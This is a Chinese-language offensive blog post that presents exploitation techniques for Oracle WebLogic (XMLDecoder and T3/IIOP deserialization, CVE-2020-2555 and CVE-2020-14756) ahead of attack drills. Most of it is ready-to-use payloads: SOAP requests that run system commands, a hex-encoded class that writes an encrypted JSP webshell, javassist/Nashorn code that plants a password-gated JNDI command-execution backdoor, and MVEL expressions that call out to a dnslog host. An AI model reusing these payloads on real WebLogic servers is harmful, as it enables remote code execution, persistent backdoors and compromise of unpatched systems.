HW前你需要了解的weblogic攻击手法

话不多说,直接上payload

XmlDecoder反序列化漏洞

目前公开的exp中,绝大多数的功能都十分有限,例如回显,写shell,反弹shell。写入webshell往往还找不准目录。下面公开一个weblogic 10/12下测试成功的代码,获取weblogic 所有webapp应用的exp,当然,这段代码也可以在T3环境下运行,你也可以用来跨webapp来注册内存马。


    public List<WebAppServletContext> findAllContext() throws ClassNotFoundException, InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException {
        java.lang.reflect.Method m = Class.forName("weblogic.t3.srvr.ServerRuntime").getDeclaredMethod("theOne");
        m.setAccessible(true);
        ServerRuntime serverRuntime = (ServerRuntime) m.invoke(null);
        List<WebAppServletContext> list = new java.util.ArrayList();
        StringBuilder sb = new StringBuilder();
        for (weblogic.management.runtime.ApplicationRuntimeMBean applicationRuntime : serverRuntime.getApplicationRuntimes()) {
            java.lang.reflect.Field childrenF = applicationRuntime.getClass().getSuperclass().getDeclaredField("children");
            childrenF.setAccessible(true);
            java.util.HashSet set = (java.util.HashSet) childrenF.get(applicationRuntime);
            java.util.Iterator iterator = set.iterator();
            while (iterator.hasNext()) {
                Object key = iterator.next();
                if (key.getClass().getName().equals("weblogic.servlet.internal.WebAppRuntimeMBeanImpl")) {

                    Field contextF = key.getClass().getDeclaredField("context");
                    contextF.setAccessible(true);
                    WebAppServletContext context = (WebAppServletContext) contextF.get(key);
                    list.add(context);
                }
            }
        }
        return list;
    }

通过这段代码,我们可以很方便的去向weblogic写马

weblogic 10 exploit

命令执行

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0xcafebabe0000003201340a001000a10700a20700a30a000300a10800a40a000300a50a000300a60a00a700a80a000200a90800aa0a000d00ab0800ac0700ad0a000d00ae0a00af00b00700b10a00af00b20700b30700b40a001300a10a001200b50a001000b60a000d00b70800b80a000d00b90a00ba00b00a00ba00bb0700bc0a001c00bd0b00be00bf0b00be00c00a000d00c10800c20a00a700c30800590700c40b00c500c60a004900c70b00c500bd0800c80a002400c90a002400ca0a002400cb0a002f00cc0a00a700cd0800ce0700cf09002f00d00800d10800d20a002f00d30700d40a003400d50a003400d60a003400d70800d80800d90800da0800db0a00dc00dd0a00a700de0800df0a00a700e00800e10800e20800e30800e40700e50a004400e60a004400e70a004400e80a00e900ea0700eb0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100154c756e69636f64655365632f6d656d7368656c6c3b010010696e6a6563745368656c6c546f4d656d010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010001780100124c6a6176612f6c616e672f537472696e673b01000e66696e64416c6c436f6e7465787401001228294c6a6176612f7574696c2f4c6973743b010008636f6e74657874460100194c6a6176612f6c616e672f7265666c6563742f4669656c643b010007636f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100036b65790100124c6a6176612f6c616e672f4f626a6563743b0100096368696c6472656e460100037365740100134c6a6176612f7574696c2f486173685365743b0100086974657261746f720100144c6a6176612f7574696c2f4974657261746f723b0100126170706c69636174696f6e52756e74696d650100354c7765626c6f6769632f6d616e6167656d656e742f72756e74696d652f4170706c69636174696f6e52756e74696d654d4265616e3b010004617272240100365b4c7765626c6f6769632f6d616e6167656d656e742f72756e74696d652f4170706c69636174696f6e52756e74696d654d4265616e3b0100046c656e240100014901000269240100016d01001a4c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657276657252756e74696d650100204c7765626c6f6769632f74332f737276722f53657276657252756e74696d653b0100046c6973740100104c6a6176612f7574696c2f4c6973743b01000273620100194c6a6176612f6c616e672f537472696e674275696c6465723b0100164c6f63616c5661726961626c65547970655461626c650100424c6a6176612f7574696c2f4c6973743c4c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b3e3b01000d537461636b4d61705461626c650700eb0700ec0700b30700ed0700a30700650700ee0700ef0700bc0700f001000a457863657074696f6e730700f10700f20700f30700f40700f50100095369676e617475726501004428294c6a6176612f7574696c2f4c6973743c4c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b3e3b01000a6c697374576562617070010008636f6e7465787473010001690100464c6a6176612f7574696c2f4974657261746f723c4c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b3e3b0700f601000a77726974655368656c6c0100097368656c6c46696c6501000e4c6a6176612f696f2f46696c653b01001066696c654f757470757453747265616d01001a4c6a6176612f696f2f46696c654f757470757453747265616d3b0100046e616d650100057368656c6c0700f701000465786563010003636d6401000769734c696e75780100015a0100056f73547970010004636d647301000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b0700f801000a536f7572636546696c650100226d656d7368656c6c2e6a6176612066726f6d20496e70757446696c654f626a6563740c004a004b01001c6a6176612f696f2f427974654172726179496e70757453747265616d0100176a6176612f6c616e672f537472696e674275696c646572010004686168610c00f900fa0c00fb00fc0700f70c00fd00fe0c004a00ff01001e7765626c6f6769632e74332e737276722e53657276657252756e74696d650c010001010100067468654f6e6501000f6a6176612f6c616e672f436c6173730c010201030700ec0c010401050100106a6176612f6c616e672f4f626a6563740c0106010701001e7765626c6f6769632f74332f737276722f53657276657252756e74696d650100136a6176612f7574696c2f41727261794c6973740c010801090c010a010b0c010c010b0100086368696c6472656e0c010d010e0700ef0c010f01100100116a6176612f7574696c2f486173685365740c006001110700f00c011201130c011401150c011600fc0100307765626c6f6769632e736572766c65742e696e7465726e616c2e57656241707052756e74696d654d4265616e496d706c0c0117011801002e7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578740700ed0c011901180c0055005601001e6e616d6520253330730975726c202533307309446f63726f6f742025730a0c011a00fc0c011b00fc0c011c011d0c011e00fc0c011f01200102153c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2237663535613065643862303231303830223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e01000c6a6176612f696f2f46696c650c012100540100037761720100086469636b2e6a73700c004a01220100186a6176612f696f2f46696c654f757470757453747265616d0c004a01230c012400ff0c0125004b0100157368656c6c20686173207772697474656e20746f2001000a2c20656e6a6f742069740100316661696c656420746f207772697474656e207368656c6c2c20706c6561736520636865636b20746865204170704e616d650100076f732e6e616d650701260c012701280c012900fc01000377696e0c012a012b0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c004a012c0c012d012e0c012f01300701310c01320133010013756e69636f64655365632f6d656d7368656c6c0100186a6176612f6c616e672f7265666c6563742f4d6574686f6401000e6a6176612f7574696c2f4c6973740100337765626c6f6769632f6d616e6167656d656e742f72756e74696d652f4170706c69636174696f6e52756e74696d654d4265616e0100176a6176612f6c616e672f7265666c6563742f4669656c640100126a6176612f7574696c2f4974657261746f720100206a6176612f6c616e672f436c6173734e6f74466f756e64457863657074696f6e01002b6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e546172676574457863657074696f6e0100206a6176612f6c616e672f496c6c6567616c416363657373457863657074696f6e01001f6a6176612f6c616e672f4e6f537563684d6574686f64457863657074696f6e01001e6a6176612f6c616e672f4e6f537563684669656c64457863657074696f6e0100136a6176612f696f2f494f457863657074696f6e0100106a6176612f6c616e672f537472696e670100136a6176612f6c616e672f457863657074696f6e010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e6701001428294c6a6176612f6c616e672f537472696e673b010008676574427974657301000428295b42010005285b422956010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100116765744465636c617265644d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b01000d73657441636365737369626c65010004285a2956010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100166765744170706c69636174696f6e52756e74696d657301003828295b4c7765626c6f6769632f6d616e6167656d656e742f72756e74696d652f4170706c69636174696f6e52756e74696d654d4265616e3b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000d6765745375706572636c6173730100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b01001628294c6a6176612f7574696c2f4974657261746f723b0100076861734e65787401000328295a0100046e65787401001428294c6a6176612f6c616e672f4f626a6563743b0100076765744e616d65010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a01000361646401000a6765744170704e616d6501000e676574436f6e746578745061746801000e676574526f6f7454656d7044697201001028294c6a6176612f696f2f46696c653b01000f6765744162736f6c75746550617468010006666f726d6174010039284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f537472696e673b010009736570617261746f72010015284c6a6176612f6c616e672f537472696e673b2956010011284c6a6176612f696f2f46696c653b29560100057772697465010005636c6f73650100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f77657243617365010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021004900100000000000060001004a004b0001004c0000003300010001000000052ab70001b100000002004d0000000a00020000001400040016004e0000000c000100000005004f005000000001005100520001004c00000052000400020000001ebb000259bb000359b700041205b600062bb60006b60007b60008b70009b000000002004d00000006000100000019004e0000001600020000001e004f005000000000001e0053005400010001005500560003004c0000024a0003000f000000cb120ab8000b120c03bd000db6000e4c2b04b6000f2b0103bd0010b60011c000124dbb001359b700144ebb000359b700043a042cb600153a051905be360603360715071506a2008519051507323a081908b60016b600171218b600193a09190904b6001a19091908b6001bc0001c3a0a190ab6001d3a0b190bb9001e0100990046190bb9001f01003a0c190cb60016b600201221b6002299002a190cb600161223b600193a0d190d04b6001a190d190cb6001bc000243a0e2d190eb90025020057a7ffb6840701a7ff7a2db000000004004d0000005200140000001d000f001e0014001f002100200029002100320022004e0023005d002400630025006f00260076002700800028008900290099002a00a5002b00ab002c00b7002d00c0002f00c3002200c90031004e00000098000f00a5001b00570058000d00b700090059005a000e00890037005b005c000c005d0066005d00580009006f0054005e005f000a0076004d00600061000b004e007500620063000800380091006400650005003d008c00660067000600400089006800670007000000cb004f00500000000f00bc0069006a0001002100aa006b006c0002002900a2006d006e000300320099006f0070000400710000000c0001002900a2006d007200030073000000650005ff0040000807007407007507007607007707007807007901010000ff0035000c070074070075070076070077070078070079010107007a07007b07007c07007d0000fb0049ff0002000807007407007507007607007707007807007901010000f80005007e0000000c0005007f008000810082008300840000000200850001008600520002004c0000011100060006000000662ab600264d2cb9002701004ebb000359b700043a042db9001e010099003b2db9001f0100c000243a051904122806bd001059031905b600295359041905b6002a5359051905b6002bb6002c53b8002db6000657a7ffc2bb0002591904b60007b60008b70009b000000004004d0000002200080000003600050037000c003800150039001e003a0029003b0053003c0056003e004e0000003e00060029002a0059005a000500000066004f0050000000000066005300540001000500610087006e0002000c005a00880061000300150051006f00700004007100000016000200050061008700720002000c005a0088008900030073000000110002fe001507007707007d070078fb0040007e0000000e0006007f0080008100820083008a0001008b00520002004c0000018600040008000000b2122e4d2ab600264e2db9002701003a041904b9001e010099008e1904b9001f0100c000243a052b1905b60029b60022990073bb002f59bb000359b700041905b6002bb6002cb60006b20030b600061231b60006b20030b600061232b60006b60007b700333a06bb0034591906b700353a0719072cb60008b600361907b60037bb000259bb000359b700041238b600062bb600061239b60006b60007b60008b70009b0a7ff6ebb000259123ab60008b70009b000000004004d00000036000d00000043000300450008004600100047001a0048002600490032004a0066004b0071004c007a004d007f004e00a2005000a50051004e0000005200080066003c008c008d000600710031008e008f00070026007c0059005a0005000000b2004f00500000000000b2009000540001000300af009100540002000800aa0087006e0003001000a20088006100040071000000160002000800aa008700720003001000a20088008900040073000000120003fe001007009207007707007dfb009102007e0000000e0006008a007f00820083008100800001009300520002004c0000014d0003000700000083043d123bb8003c4e2dc600112db6003d123eb6003f990005033dbb001359b700143a041c99002319041240b9002502005719041241b9002502005719042bb90025020057a7002019041242b9002502005719041243b9002502005719042bb90025020057bb0044591904b700453a05190504b60046571905b600473a061906b60048b000000004004d00000042001000000055000200560008005700180058001a005b0023005c0027005d0031005e003b005f0047006100510062005b006300640066006f006700760068007d0069004e00000048000700000083004f0050000000000083009400540001000200810095009600020008007b009700540003002300600098006e0004006f00140099009a0005007d0006009b009c000600710000000c0001002300600098009d00040073000000100003fd001a01070092fc002c0700771c007e000000040001009e0001009f0000000200a0
</string>
                </void>
                <void class="org.mozilla.classfile.DefiningClassLoader">
                    <void method="defineClass">
                        <string>unicodeSec.memshell</string>
                        <object idref="cls"></object>
                        <void method="newInstance">
                            <void method="listWebapp" id="proc">
                                <string>whoami</string>
                            </void>
                        </void>
                    </void>
                </void>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getServletOutputStream">
                                <void method="writeStream">
                                    <object idref="proc"></object>
                                </void>
                                <void method="flush"/>
                            </void>
                            <void method="getWriter"><void method="write"><string></string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

列应用

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>复制上面的内容
</string>
                </void>
                <void class="org.mozilla.classfile.DefiningClassLoader">
                    <void method="defineClass">
                        <string>unicodeSec.memshell</string>
                        <object idref="cls"></object>
                        <void method="newInstance">
                            <void method="listWebapp" id="proc">
                                <string>whoami</string>
                            </void>
                        </void>
                    </void>
                </void>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getServletOutputStream">
                                <void method="writeStream">
                                    <object idref="proc"></object>
                                </void>
                                <void method="flush"/>
                            </void>
                            <void method="getWriter"><void method="write"><string></string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

效果如图

weblogic 12 exp

在这里我是用java执行js的方式,简单快捷高效

命令执行

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
               <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0x6a617661782e7363726970742e536372697074456e67696e654d616e61676572</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str1">
                                          <object idref="cls"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="cls1">
                    <string>0x6a73</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str2">
                                          <object idref="cls1"></object>
</void>


               <void class="java.lang.Class" method="forName" id="sm">
                                           <object idref="str1"></object>
<void method="newInstance">
<void method="getEngineByName" id="engine">
                                           <object idref="str2"></object>
<void method="eval" id="echo">
<string>
var scanner = new java.util.Scanner(java.lang.Runtime.getRuntime().exec("id").getInputStream());var res = "";while (scanner.hasNextLine()){res = res + scanner.nextLine();}res
</string>
</void>
</void>
</void>
                </void>


            <void class="java.lang.Thread" method="currentThread">
                <void method="getCurrentWork" id="current_work">
                    <void method="getClass">
                        <void method="getDeclaredField">
                            <string>connectionHandler</string>
                                <void method="setAccessible"><boolean>true</boolean></void>
                            <void method="get">
                                <object idref="current_work"></object>
                                <void method="getServletRequest">
                                    <void method="getResponse">
                                        <void method="getServletOutputStream">
                                            <void method="writeStream">
                                                <object class="weblogic.xml.util.StringInputStream"><object idref="echo"></object></object>
                                                </void>
                                            <void method="flush"/>
                                            </void>
                                    <void method="getWriter"><void method="write"><string></string></void></void>
                                    </void>
                                </void>
                            </void>
                        </void>
                    </void>
                </void>
            </void>
</java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

列应用

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
               <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0x6a617661782e7363726970742e536372697074456e67696e654d616e61676572</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str1">
                                          <object idref="cls"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="cls1">
                    <string>0x6a73</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str2">
                                          <object idref="cls1"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="jsHex">
                    <string>0x76617220436c617a7a203d204a6176612e7479706528276a6176612e6c616e672e436c61737327293b0a7661722053657276657252756e74696d65436c617373203d20436c617a7a2e666f724e616d6528227765626c6f6769632e74332e737276722e53657276657252756e74696d6522293b0a2f2f6765744465636c617265644d6574686f6428227468654f6e6522290a766172207468654f6e654d6574686f64203d2053657276657252756e74696d65436c6173732e6765744465636c617265644d6574686f6428227468654f6e6522293b0a7468654f6e654d6574686f642e73657441636365737369626c652874727565293b0a7661722073657276657252756e74696d65203d207468654f6e654d6574686f642e696e766f6b65286e756c6c293b0a766172207362203d2022223b0a766172204170706c69636174696f6e52756e74696d6573203d2073657276657252756e74696d652e6765744170706c69636174696f6e52756e74696d657328293b0a666f72287661722069203d20303b693c4170706c69636174696f6e52756e74696d65732e6c656e6774683b20692b2b297b0a20202020766172206170706c69636174696f6e52756e74696d65203d204170706c69636174696f6e52756e74696d65735b695d3b0a20202020766172206368696c6472656e4669656c64203d206170706c69636174696f6e52756e74696d652e676574436c61737328292e6765745375706572636c61737328292e6765744465636c617265644669656c6428226368696c6472656e22293b0a202020206368696c6472656e4669656c642e73657441636365737369626c652874727565293b0a20202020766172206368696c6472656e203d206368696c6472656e4669656c642e676574286170706c69636174696f6e52756e74696d65293b0a20202020766172206368696c6472656e4172726179203d206368696c6472656e2e746f417272617928293b0a20202020666f7228766172206a3d303b206a3c6368696c6472656e41727261792e6c656e6774683b6a2b2b297b0a2020202020202020766172206b6579203d206368696c6472656e41727261795b6a5d3b0a2020202020202020696620286b65792e676574436c61737328292e6765744e616d6528292e657175616c7328227765626c6f6769632e736572766c65742e696e7465726e616c2e57656241707052756e74696d654d4265616e496d706c222929207b0a20202020202020202020202076617220636f6e7465787446203d206b65792e676574436c61737328292e6765744465636c617265644669656c642822636f6e7465787422293b0a202020202020202020202020636f6e74657874462e73657441636365737369626c652874727565293b0a2020202020202020202020202f2f20e998b2e6ada26a73e79a84e5bcbae588b6e8bdace59e8b0a2020202020202020202020207362203d207362202b20636f6e74657874462e676574286b6579292e6765744170704e616d652829202b20225c74223b0a2020202020202020202020207362203d207362202b20636f6e74657874462e676574286b6579292e676574436f6e74657874506174682829202b20225c74223b0a2020202020202020202020207362203d207362202b20636f6e74657874462e676574286b6579292e676574526f6f7454656d7044697228292e6765744162736f6c757465506174682829202b20225c6e223b0a20202020202020207d0a202020207d0a7d0a7362</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="js">
                                          <object idref="jsHex"></object>
</void>


               <void class="java.lang.Class" method="forName" id="sm">
                                           <object idref="str1"></object>
<void method="newInstance">
<void method="getEngineByName" id="engine">
                                           <object idref="str2"></object>
<void method="eval" id="echo">
                                         <object idref="js"></object>
</void>
</void>
</void>
                </void>


            <void class="java.lang.Thread" method="currentThread">
                <void method="getCurrentWork" id="current_work">
                    <void method="getClass">
                        <void method="getDeclaredField">
                            <string>connectionHandler</string>
                                <void method="setAccessible"><boolean>true</boolean></void>
                            <void method="get">
                                <object idref="current_work"></object>
                                <void method="getServletRequest">
                                    <void method="getResponse">
                                        <void method="getServletOutputStream">
                                            <void method="writeStream">
                                                <object class="weblogic.xml.util.StringInputStream"><object idref="echo"></object></object>
                                                </void>
                                            <void method="flush"/>
                                            </void>
                                    <void method="getWriter"><void method="write"><string></string></void></void>
                                    </void>
                                </void>
                            </void>
                        </void>
                    </void>
                </void>
            </void>


</java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

T3反序列化

weblogic T3反序列化漏洞经久不衰,总有憨批不打补丁。下面我们介绍一下T3的打法

1. 探测漏洞

网上大佬们的工具都很牛逼。但是有一个问题,那就是探测漏洞这块,大家好像不太利索。通用的方法是,打一下dnslog并检测dnslog的记录以判断目标是否存在漏洞。这里我介绍一种更为简便的方法用来探测漏洞,适用于weblogic 10/12

weblogic codebase功能,简单来讲就是T3/iiop等rmi协议,在反序列化某些类的时候,如果当前系统中不存在该类,则去对方的codebase地址中下载该类并加载,对,你没听错。发散一下思维,如果我们下载的是weblogic的类呢?所以我们可以下载weblogic的黑名单,反编译看一下目标weblogic都打过什么补丁。

请求地址 http://xx:8091/bea_wls_internal/classes/weblogic/utils/io/oif/WebLogicFilterConfig.class

下载后的文件放入java反编译工具,即可了解目标是否打过补丁。当然,检测weblogic xmldecoder的反序列化也可以用这招。只不过请求的路径为

http://192.168.119.130:8088//bea_wls_internal/classes/weblogic/wsee/workarea/WorkContextXmlInputAdapter.class

2. 漏洞利用

在这里我推荐一下weblogic利用工具,r4v3zn老哥的weblogic-framework 利用工具, 。当然也有一点点bug,不过这是一款非常好用的工具

当然这一块主要是给红队开发看的,我们知道cve-2020-2555 gadget 的链式执行中,很难做到任意代码的执行。目前绝大多数的方法是上传一个jar包或者利用urlclassloader的方式加载远程恶意jar包以实现任意代码执行。

但是我们可以使用java自带的js引擎,做到任意执行js代码,而且自从java1.6开始便支持此功能。也就是说,这种情况适用于绝大多数的weblogic目标。

java自带的js名字叫做nashorn,支持调用任意的java方法,但是js是弱类型语言,在某些场景下,可能需要调试以避免自动类型转换的bug。

所以我实现了js调用javaassist去动态组装一个ClusterMasterRemote类并植入weblogic的jndi实例。话不多说,直接上代码

print('Powered by 蛋黄!');
var ClassPool = Java.type('javassist.ClassPool');
var CtField = Java.type('javassist.CtField');
var CtClass = Java.type('javassist.CtClass');
var Modifier = Java.type('javassist.Modifier')
var CtConstructor = Java.type('javassist.CtConstructor')
var CtMethod = Java.type('javassist.CtMethod')

var pool = ClassPool.getDefault();

var cc = pool.makeClass("org.unicodesec.RemoteImpl");
cc.addInterface(pool.get("weblogic.cluster.singleton.ClusterMasterRemote"));
var param = new CtField(pool.get("java.lang.String"), "bindName", cc);
param.setModifiers(Modifier.PRIVATE);
cc.addField(param, CtField.Initializer.constant("unicodeSec"));

var cons = new CtConstructor(null, cc);
cons.setBody("{javax.naming.Context ctx = new javax.naming.InitialContext();\n" +
    "ctx.rebind(bindName, this);\n" +
    "System.out.println(\"installed\");}");

cc.addConstructor(cons);
var setServerLocationM = new CtMethod(CtClass.voidType, "setServerLocation", [pool.get("java.lang.String"), pool.get("java.lang.String")], cc);
setServerLocationM.setExceptionTypes([pool.get("java.rmi.RemoteException")]);
cc.addMethod(setServerLocationM);

var getServerLocationM = new CtMethod(pool.get("java.lang.String"), "getServerLocation", [pool.get("java.lang.String")], cc);
getServerLocationM.setExceptionTypes([pool.get("java.rmi.RemoteException")]);
getServerLocationM.setBody("{try {\n" +
    "            String cmd = $1;\n" +
    "            if (!cmd.startsWith(\"showmecode\")) {\n" +
    "                return \"guess me?\";\n" +
    "            } else {\n" +
    "                cmd = cmd.substring(10);\n" +
    "            }\n" +
    "\n" +
    "            boolean isLinux = true;\n" +
    "            String osTyp = System.getProperty(\"os.name\");\n" +
    "            if (osTyp != null && osTyp.toLowerCase().contains(\"win\")) {\n" +
    "                isLinux = false;\n" +
    "            }\n" +
    "            java.util.List cmds = new java.util.ArrayList();\n" +
    "\n" +
    "            if (cmd.startsWith(\"$NO$\")) {\n" +
    "                cmds.add(cmd.substring(4));\n" +
    "            } else if (isLinux) {\n" +
    "                cmds.add(\"/bin/bash\");\n" +
    "                cmds.add(\"-c\");\n" +
    "                cmds.add(cmd);\n" +
    "            } else {\n" +
    "                cmds.add(\"cmd.exe\");\n" +
    "                cmds.add(\"/c\");\n" +
    "                cmds.add(cmd);\n" +
    "            }\n" +
    "\n" +
    "            ProcessBuilder processBuilder = new ProcessBuilder(cmds);\n" +
    "            processBuilder.redirectErrorStream(true);\n" +
    "            Process proc = processBuilder.start();\n" +
    "\n" +
    "            java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream()));\n" +
    "            StringBuffer sb = new StringBuffer();\n" +
    "\n" +
    "            String line;\n" +
    "            while ((line = br.readLine()) != null) {\n" +
    "                sb.append(line).append(\"\\n\");\n" +
    "            }\n" +
    "\n" +
    "            return sb.toString();\n" +
    "        } catch (Exception e) {\n" +
    "            return e.getMessage();\n" +
    "        }}");
cc.addMethod(getServerLocationM);
cc.setModifiers(Modifier.PUBLIC);
cc.toClass().newInstance();

当然,corherence gadget处需要修改成如下

    private static ChainedExtractor getChainedExtractor() {
        return new ChainedExtractor(new ReflectionExtractor[]{
                new ReflectionExtractor(
                        "newInstance", new Object[]{}
                ),
                new ReflectionExtractor(
                        "getEngineByName", new Object[]{"nashorn"}
                ),
                new ReflectionExtractor(
                        "eval", new Object[]{getJsCode()}
                )

        });
    }

3. weblogic 回显

weblogic 回显常见的有两种姿势,在这里不讨论dnslog这种。既然都直接建立T3了,还用dnslog回传命令执行的结果,这不是脱裤子放屁嘛

3.1 Jndi实例

该种方法通过反序列化的任意代码执行,向目标weblogic植入jndi实例,随后调用jndi实例以获取命令执行的结果

3.2 报错回显

T3相比IIOP协议,可以将服务器上T3协议的错误通过反序列化传输给客户端以供判断,我们可以控制报错信息以将命令执行的结果传输给客户端

4. 实战cve-2020-14756

在这里我们不谈漏洞原理与分析,我们只谈利用。

4.1 mvel表达式报错回显

原理,通过urlclassloader的loadclass报错,如果系统中没有待查找的类,则会将类名显示出来。所以我们可以构造如下的mvel表达式

new MvelExtractor("new java.net.URLClassLoader(new java.net.URL[]{new 
java.net.URL(\"http://2e1n60.dnslog.cn:10000\")}).loadClass(System.getProperty(\"java.version\"));"
);

加载一个并不存在的jar,则自然会报错,大概如下

4.2 植入jndi实例

我们需要植入一个稳定的后门,在这里我选择植入jndi实例。当然mvel在执行js的时候,会遇到关于字符串转义的问题。我们通过加载base64编码的方式以规避该问题,mvel表达式如下

new MvelExtractor(String.format("new 
javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(new 
java.lang.String(java.util.Base64.getDecoder().decode(\"%s\"), \"utf-8\"));"
, x))

当然,其他的漏洞我也已经改成js代码,hw前将会放开下载工具